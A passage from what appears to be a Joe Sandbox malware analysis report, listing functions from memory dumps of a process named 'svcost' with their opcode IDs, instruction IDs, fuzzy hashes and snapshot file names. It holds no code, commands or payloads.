                                                                                            • Opcode ID: 178787fb1b33a47d8fd6775d8a5c4458d8052c39a703fbda49ff1eaadba82a1c
                                                                                            • Instruction ID: 62adb433e48f03444172184f87f74bf39971a96c16f74802d153cd767962a4bf
                                                                                            • Opcode Fuzzy Hash: 178787fb1b33a47d8fd6775d8a5c4458d8052c39a703fbda49ff1eaadba82a1c
                                                                                            • Instruction Fuzzy Hash: 7FF05434809248EFCF06CFA4D9609DD7F75EB06304F14819EEC455A662C6365926DF12
                                                                                            Function 023A1292 Relevance: .0, Instructions: 29COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515889967.00000000023A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_23a0000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 9b87506959a17d7afe880d8a004d598669bf92a36befefc74c6dee52b5f041d0
                                                                                            • Instruction ID: 5cc3f928880e510babc0beb43dd83535ac038b86aac574cfce4d236ca770d7da
                                                                                            • Opcode Fuzzy Hash: 9b87506959a17d7afe880d8a004d598669bf92a36befefc74c6dee52b5f041d0
                                                                                            • Instruction Fuzzy Hash: AA014BB4D052688FDB64DF18D894BD9BBF1BB09301F1051EAD809A2250D7715FC5CF05
                                                                                            Function 023A5CAF Relevance: .0, Instructions: 29COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515889967.00000000023A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_23a0000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 2585a91432079b6d8d21aeceb114cc5832c0efa4c2e9dee7243acf3a83c8f5a8
                                                                                            • Instruction ID: e76ba385e875fc547c9fa35367f08d4b70bdff020e47c659a81ba20a68244821
                                                                                            • Opcode Fuzzy Hash: 2585a91432079b6d8d21aeceb114cc5832c0efa4c2e9dee7243acf3a83c8f5a8
                                                                                            • Instruction Fuzzy Hash: 0EF05870C0A3489FCF05DFA8D46069CBFB0FF06208F2482EAC858A7252D7359A45CF51
                                                                                            Function 0211D198 Relevance: .0, Instructions: 28COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515790903.0000000002110000.00000040.00000800.00020000.00000000.sdmp, Offset: 02110000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_2110000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: e2f6bd6646ac1dc26d2206a8b37e5a5677364def0b1e4dbc4327b0a8f011cdd7
                                                                                            • Instruction ID: dba0696887de9ad1dc8dd7f95c2c8c00201d44416f26ea189cdf93491b915516
                                                                                            • Opcode Fuzzy Hash: e2f6bd6646ac1dc26d2206a8b37e5a5677364def0b1e4dbc4327b0a8f011cdd7
                                                                                            • Instruction Fuzzy Hash: ABF08C34809348AFCB05CFA4E491AACBFB4EF0A300F0482EAD89057262CB345A14DF51
                                                                                            Function 00698CC0 Relevance: .0, Instructions: 28COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515632838.0000000000690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00690000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_690000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: a9baba0f0cc36ec0449f44107dd7fa02dfe5862e1d7be9f862d66324f514c624
                                                                                            • Instruction ID: 45206592f093ff64fa987ece3cf02dd179c6a81e35ec5a050c4a1f9f2c58ba6e
                                                                                            • Opcode Fuzzy Hash: a9baba0f0cc36ec0449f44107dd7fa02dfe5862e1d7be9f862d66324f514c624
                                                                                            • Instruction Fuzzy Hash: DBE0657484B2889FD702DBB599616DD7FB1DF03244B1441EAD44197AA3C9390D1A8BA2
                                                                                            Function 00693498 Relevance: .0, Instructions: 28COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515632838.0000000000690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00690000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_690000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 4de353214ff1b1aa35526ac3c316d53671049cb8cb73f32db6650a5b9f504c53
                                                                                            • Instruction ID: 5d6e6efc8807d08b354c135aa7e99595ecbcb8cdf0cb4308ef8f0694e7ccf993
                                                                                            • Opcode Fuzzy Hash: 4de353214ff1b1aa35526ac3c316d53671049cb8cb73f32db6650a5b9f504c53
                                                                                            • Instruction Fuzzy Hash: 73F06D74949244EFCB06CF64D9205A8BFB9FB47324F2491EAC8089B761D7324A4ADB61
                                                                                            Function 023A6218 Relevance: .0, Instructions: 28COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515889967.00000000023A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_23a0000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 4ebf752a89d0d584ac1cdeaed888c9834e185b671bdb46717562ec40834a2d91
                                                                                            • Instruction ID: 8e5925327ccb6ad93d2218c37e0b871c11d00cbb7688708cc42f6929fc528b09
                                                                                            • Opcode Fuzzy Hash: 4ebf752a89d0d584ac1cdeaed888c9834e185b671bdb46717562ec40834a2d91
                                                                                            • Instruction Fuzzy Hash: AFF08235819244DFCB01CF64C899D9C7FB8EF0B311F0481E9D84597622C3315955DF11
                                                                                            Function 023AFF58 Relevance: .0, Instructions: 28COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515889967.00000000023A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_23a0000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 543bbf629cf133c10a4cec309ec32347334624e6bf9cb58e667b8ee38778676b
                                                                                            • Instruction ID: dc4b9b51b8659ccef7f359ab2fb63c6f4306413fb92970e44045281146649d73
                                                                                            • Opcode Fuzzy Hash: 543bbf629cf133c10a4cec309ec32347334624e6bf9cb58e667b8ee38778676b
                                                                                            • Instruction Fuzzy Hash: 04F0153480E2849FCB05CBA4D9619ACBFB4EF4B319B2482EEC84697653C6325916CB81
                                                                                            Function 02119058 Relevance: .0, Instructions: 27COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515790903.0000000002110000.00000040.00000800.00020000.00000000.sdmp, Offset: 02110000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_2110000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 959f07ff30da4ab88c9615411614b9d533e529b64eceda514d2a923a83a14710
                                                                                            • Instruction ID: 0329af6f06c96f3226575e094556dfb90fdd9a4367ed274b62eb71034e01c0b2
                                                                                            • Opcode Fuzzy Hash: 959f07ff30da4ab88c9615411614b9d533e529b64eceda514d2a923a83a14710
                                                                                            • Instruction Fuzzy Hash: 10F08C74D04208EFCB44CFA8C820AADBBF8EB49310F00C0AAE8A8D3340C7359A51DF50
                                                                                            Function 00697492 Relevance: .0, Instructions: 27COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515632838.0000000000690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00690000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_690000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 7f4b30c11a387d45e6a66afa0d85e1f0cb69796801f3759aad1a4caf6eb2e159
                                                                                            • Instruction ID: e5fb16d8d815f81ba402c9c7638b165e66327187bffcbafc46d1e98aa2a418ca
                                                                                            • Opcode Fuzzy Hash: 7f4b30c11a387d45e6a66afa0d85e1f0cb69796801f3759aad1a4caf6eb2e159
                                                                                            • Instruction Fuzzy Hash: DEE0ED3490E2849FCB02CBA0D8A18ACBFB2EB47300F1481DAC8455BB53C6395D17CB11
                                                                                            Function 00698661 Relevance: .0, Instructions: 27COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515632838.0000000000690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00690000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_690000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 7a613e357ae9f044796ae3a8e044cf63b560a9638442c878819a8541ba38cb92
                                                                                            • Instruction ID: e93817de33c3ccff3f27acfc44a8c7105b212593e9081537d04bc472f7377b87
                                                                                            • Opcode Fuzzy Hash: 7a613e357ae9f044796ae3a8e044cf63b560a9638442c878819a8541ba38cb92
                                                                                            • Instruction Fuzzy Hash: 53F05E74C0D384AFCB01CBA4C9609ACBFB0EB4B210F1882EFC89597252C6365A46DF52
                                                                                            Function 023A77B1 Relevance: .0, Instructions: 27COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515889967.00000000023A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_23a0000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 70536e67a9e945a19bbff5d97994930e2a4f9a0c3eb3f750d46ed998bb1c8071
                                                                                            • Instruction ID: df3a212d4b6131b6bd1149dec62f27f4266c4f5841ef8b0bd5b402e1e30dd11f
                                                                                            • Opcode Fuzzy Hash: 70536e67a9e945a19bbff5d97994930e2a4f9a0c3eb3f750d46ed998bb1c8071
                                                                                            • Instruction Fuzzy Hash: FFF03A34A052449FCB45CF68D4606ACFFB0FF4A204F1482EAC81893242C7315916CF41
                                                                                            Function 023A8C21 Relevance: .0, Instructions: 27COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515889967.00000000023A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_23a0000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 9f7b129e506f9c5215b44ce5908e009b39149590a33ff15f1687fcb98853a93f
                                                                                            • Instruction ID: 67d55c777cd9cdbacd4c6ae4fdc8a03617ad33ce512a5ea57fa336cf33bd7eb9
                                                                                            • Opcode Fuzzy Hash: 9f7b129e506f9c5215b44ce5908e009b39149590a33ff15f1687fcb98853a93f
                                                                                            • Instruction Fuzzy Hash: 67F05E70D0E3849FCB45DBA4C96599CFFB0EB4A204F1881EEC859D3252D6354A45CF01
                                                                                            Function 023A5D28 Relevance: .0, Instructions: 27COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515889967.00000000023A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_23a0000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 61e1a245610ca3eda0f5ffff6c6bd0a289f62eb90450933f04a08983340d3a16
                                                                                            • Instruction ID: a252e5563eb971fd22afca201f1023a05dc5d82ed9e305524e8c9493cd365c3b
                                                                                            • Opcode Fuzzy Hash: 61e1a245610ca3eda0f5ffff6c6bd0a289f62eb90450933f04a08983340d3a16
                                                                                            • Instruction Fuzzy Hash: 52F0A03484A3889FCB01DFB8C86969CBFB4EB0B205F1001EAC849D3262D6304544CB11
                                                                                            Function 00690858 Relevance: .0, Instructions: 26COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515632838.0000000000690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00690000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_690000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: d8016c2e09be2e103436e3411394198e2e4f94d423ae3013b2b35ea8f8d98fe9
                                                                                            • Instruction ID: d139c729df6499d2ad119a251a3ff5f695b53c250ff7cecb5b94728f6b65cb88
                                                                                            • Opcode Fuzzy Hash: d8016c2e09be2e103436e3411394198e2e4f94d423ae3013b2b35ea8f8d98fe9
                                                                                            • Instruction Fuzzy Hash: 8CF0ED30A09280EFCF09CBA0DA105ACBF34EF47314F1490EAC844AB3A2C7324902CB81
                                                                                            Function 00693BD8 Relevance: .0, Instructions: 26COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515632838.0000000000690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00690000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_690000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 5fd37742bd4fcdb9a8181facce958f166f1006fc293b554f2808bd66fa7c7b99
                                                                                            • Instruction ID: ec99126b9ff856a374b75c72fcef765d91a775b2b92064f3a88d0536f03486a6
                                                                                            • Opcode Fuzzy Hash: 5fd37742bd4fcdb9a8181facce958f166f1006fc293b554f2808bd66fa7c7b99
                                                                                            • Instruction Fuzzy Hash: B9F0E53450D284DFCB02CFA4D8609ACBF74EB07304F1482DDC80557792C7369916DB51
                                                                                            Function 0069D3B0 Relevance: .0, Instructions: 26COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515632838.0000000000690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00690000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_690000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 0b1b0e018b1ba4bcad7a91d111ded9586fc5af637f3af91a4993eb81ee94dc6c
                                                                                            • Instruction ID: fd61b2e601cc14ce8800904ddcc43ec1e22dbfbccc165d99197b3c176326ed38
                                                                                            • Opcode Fuzzy Hash: 0b1b0e018b1ba4bcad7a91d111ded9586fc5af637f3af91a4993eb81ee94dc6c
                                                                                            • Instruction Fuzzy Hash: 32F03074D15248DFDB40DB74C990A9CBFB5DB0A215F2045EAC809D7651D6718A46CF01
                                                                                            Function 00697D21 Relevance: .0, Instructions: 26COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515632838.0000000000690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00690000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_690000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: d5557f5e4274b43778905b7b80bdf9f339ed9d8fce78aebb85b0829cd5b193ae
                                                                                            • Instruction ID: 6d59b0527d8f70edbaa967ff715903087b51bbae30669575f3229771e8ce6d22
                                                                                            • Opcode Fuzzy Hash: d5557f5e4274b43778905b7b80bdf9f339ed9d8fce78aebb85b0829cd5b193ae
                                                                                            • Instruction Fuzzy Hash: D2E0ED3481E2449FCB01CBB0D8A29ACBF70EF47300F2092DAC8049B792C235494ADB01
                                                                                            Function 00698778 Relevance: .0, Instructions: 26COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515632838.0000000000690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00690000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_690000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: fbd194ee31350c20af07424e9601faaf645d5c95b441f624cb687b08728cf964
                                                                                            • Instruction ID: 72a8051f4c6eb4d7aaba42c888506a26b4839ba84b38ba85172c97820b227597
                                                                                            • Opcode Fuzzy Hash: fbd194ee31350c20af07424e9601faaf645d5c95b441f624cb687b08728cf964
                                                                                            • Instruction Fuzzy Hash: 04F0E530C162449FCB41DBB8CC5069C7FB1EB0A324F2042E9C418D77A2D6328946CB01
                                                                                            Function 0211DEE0 Relevance: .0, Instructions: 25COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515790903.0000000002110000.00000040.00000800.00020000.00000000.sdmp, Offset: 02110000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_2110000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: ff4b445e5c16234e3f20b211689203c9228221ebd2229671585aa2541a898c30
                                                                                            • Instruction ID: c6ed94ee00139680b0b5ff550142274b895e372d0b3f1376a285f4590a74144b
                                                                                            • Opcode Fuzzy Hash: ff4b445e5c16234e3f20b211689203c9228221ebd2229671585aa2541a898c30
                                                                                            • Instruction Fuzzy Hash: 6FE0D83230030987C710AB9BEC84C5BFB9AEFD0231300CA3AD10E87120CE70AC0687D5
                                                                                            Function 02115770 Relevance: .0, Instructions: 25COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515790903.0000000002110000.00000040.00000800.00020000.00000000.sdmp, Offset: 02110000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_2110000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: c815a5318a27e7d6fef732d1b8e28b760a8d36110107c147fc2082af339b9ed0
                                                                                            • Instruction ID: 2acbac661fb762bf2a51c3b6a56f0af456ef2a6becd4ee902607a61be86a2939
                                                                                            • Opcode Fuzzy Hash: c815a5318a27e7d6fef732d1b8e28b760a8d36110107c147fc2082af339b9ed0
                                                                                            • Instruction Fuzzy Hash: 8CF0A03890E388EFCB15CBA0D9609ADBF70DF47314F1481EED88557292D33A4915CB11
                                                                                            Function 00692958 Relevance: .0, Instructions: 25COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515632838.0000000000690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00690000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_690000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 53617d03ceb93a6812f5b1dc390fe2b15441c5c2fdb6d27482879c017d8c5d11
                                                                                            • Instruction ID: c57bd5414aec5a1f647b8b9d9ad40c550119abb99ceaf56e1e111ee5e882c8a6
                                                                                            • Opcode Fuzzy Hash: 53617d03ceb93a6812f5b1dc390fe2b15441c5c2fdb6d27482879c017d8c5d11
                                                                                            • Instruction Fuzzy Hash: D5F0ED3490D380DFCB06CBA4D92066CBF75EB07319F2891DEC4044BBA2C6324A0ACB51
                                                                                            Function 006986F8 Relevance: .0, Instructions: 25COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515632838.0000000000690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00690000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_690000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 3e4efd47b460924ebb4066df253a79ae6f5c485eb8d739d6e5b9e22882ffc180
                                                                                            • Instruction ID: ff552e8f0136617adc0f7da535548f2fe2aaee44dc5155c30b998d131c00adbe
                                                                                            • Opcode Fuzzy Hash: 3e4efd47b460924ebb4066df253a79ae6f5c485eb8d739d6e5b9e22882ffc180
                                                                                            • Instruction Fuzzy Hash: 74E0D83444D2808FCB01C76499709EC7F749B07214B2851DEC8458B663D6364D0BDF11
                                                                                            Function 00690F30 Relevance: .0, Instructions: 25COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515632838.0000000000690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00690000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_690000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: e44843b61f514b7d95b4b65cc519de0c9ccb74b8294d5598d290852cc7aefe59
                                                                                            • Instruction ID: 442c289a9110d62ffbf5c5fbfd30f21f1e786fe8b025613aac9d7a33338cbf40
                                                                                            • Opcode Fuzzy Hash: e44843b61f514b7d95b4b65cc519de0c9ccb74b8294d5598d290852cc7aefe59
                                                                                            • Instruction Fuzzy Hash: F8E09278809284CFDB15CF60E9605E87F75EB47305F1491DAC8989B762C6324A42DB11
                                                                                            Function 023A7122 Relevance: .0, Instructions: 25COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515889967.00000000023A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_23a0000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 32c708583d98ad20949011f08b310c4af72d89ea661011cdcfbbb30e184cb4a9
                                                                                            • Instruction ID: dfa17ddbff6f6165beef6fbd41761c0342748effeacb554672eb19acc0431d51
                                                                                            • Opcode Fuzzy Hash: 32c708583d98ad20949011f08b310c4af72d89ea661011cdcfbbb30e184cb4a9
                                                                                            • Instruction Fuzzy Hash: C0F03971909244DFC740DFB8D9A165CBBF4EF0A204F1440EAC808CB362DB329A46CB92
                                                                                            Function 021155C9 Relevance: .0, Instructions: 24COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515790903.0000000002110000.00000040.00000800.00020000.00000000.sdmp, Offset: 02110000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_2110000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 1351d7e54e5e3cb6e7411ac42aa07e1d18e828b401d3205d59a32d636536b877
                                                                                            • Instruction ID: f81446b5e5d7604fc005b4c352425687af9895eb00a0701334b017f99ce65a40
                                                                                            • Opcode Fuzzy Hash: 1351d7e54e5e3cb6e7411ac42aa07e1d18e828b401d3205d59a32d636536b877
                                                                                            • Instruction Fuzzy Hash: C0E09270A0E3889FC705CBA4D9609ACBF759F87218F1481EFC4445B693C7324A46CB12
                                                                                            Function 023A9330 Relevance: .0, Instructions: 24COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515889967.00000000023A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_23a0000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 1e570e2b8aef11bd1e118bcfb6ba1f5c526f1b890b156ac5ada9bd4877011e81
                                                                                            • Instruction ID: 6fb55aa43d5cac41bb0ff6e9b97486c353722617e2ae9fd714e7132bbfe14923
                                                                                            • Opcode Fuzzy Hash: 1e570e2b8aef11bd1e118bcfb6ba1f5c526f1b890b156ac5ada9bd4877011e81
                                                                                            • Instruction Fuzzy Hash: 07F0E5B190D388AFCB02CBB09C1465C7FB0DF42200F4442DFD445CB193DA304A158741
                                                                                            Function 023A6028 Relevance: .0, Instructions: 24COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515889967.00000000023A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_23a0000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: dbd95a2131a3b3ba78af812cc53071eef5513831ff32de7b351d823659c86640
                                                                                            • Instruction ID: 65562b3d3992848480e59e2ca7a495cf5b7d443f24cd524e18f72f0dcf98e58e
                                                                                            • Opcode Fuzzy Hash: dbd95a2131a3b3ba78af812cc53071eef5513831ff32de7b351d823659c86640
                                                                                            • Instruction Fuzzy Hash: A0E0927080E3889FDB05CBA49962AAD7F78DB07201F0442EEC805A3622C2350989CF22
                                                                                            Function 023ABF78 Relevance: .0, Instructions: 24COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515889967.00000000023A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_23a0000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: bcb4a50de13f713c4fc7c70caa4730d872ef302adf65f4091fd5148899a8efec
                                                                                            • Instruction ID: bb36c4e8400af967550a72c04ad7eb4a8fba9cea7d3b9c5c249d09983e37c3ed
                                                                                            • Opcode Fuzzy Hash: bcb4a50de13f713c4fc7c70caa4730d872ef302adf65f4091fd5148899a8efec
                                                                                            • Instruction Fuzzy Hash: EEE08C31B28307CE8B584AB89824B2EB2DBEBA454C34C4478A406C7482EB30C800CE91
                                                                                            Function 021137A8 Relevance: .0, Instructions: 23COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515790903.0000000002110000.00000040.00000800.00020000.00000000.sdmp, Offset: 02110000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_2110000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 621cf278bf1502ecfc4a69cda463b58897a0e5a81665cbbf4482fb1e75e94aae
                                                                                            • Instruction ID: 270c21e9259c1f9dd2bb9132fca8403e35cee12cb0abe4acab63d0c9bde511ba
                                                                                            • Opcode Fuzzy Hash: 621cf278bf1502ecfc4a69cda463b58897a0e5a81665cbbf4482fb1e75e94aae
                                                                                            • Instruction Fuzzy Hash: E1E022B4E492489FCB04CBA0C924A6CBFB49F47324F1481EDC80827382C7314902CF01
                                                                                            Function 0541D530 Relevance: .0, Instructions: 23COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.520103714.0000000005400000.00000040.00000800.00020000.00000000.sdmp, Offset: 05400000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_5400000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: ec9e80696b35f40953bd44d28ecb9b37b7c5a8e040e650cff97bfdb660b90a96
                                                                                            • Instruction ID: 0d05caa06999c543ec192fa1af804f56228de4b5967c6f37e8394b394fb5a842
                                                                                            • Opcode Fuzzy Hash: ec9e80696b35f40953bd44d28ecb9b37b7c5a8e040e650cff97bfdb660b90a96
                                                                                            • Instruction Fuzzy Hash: 39E039B4D04208EFCB44DFA8C550A9DBBB4EB48304F10C0AA9C1893300D7319A42CF41
                                                                                            Function 0541A3D0 Relevance: .0, Instructions: 23COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
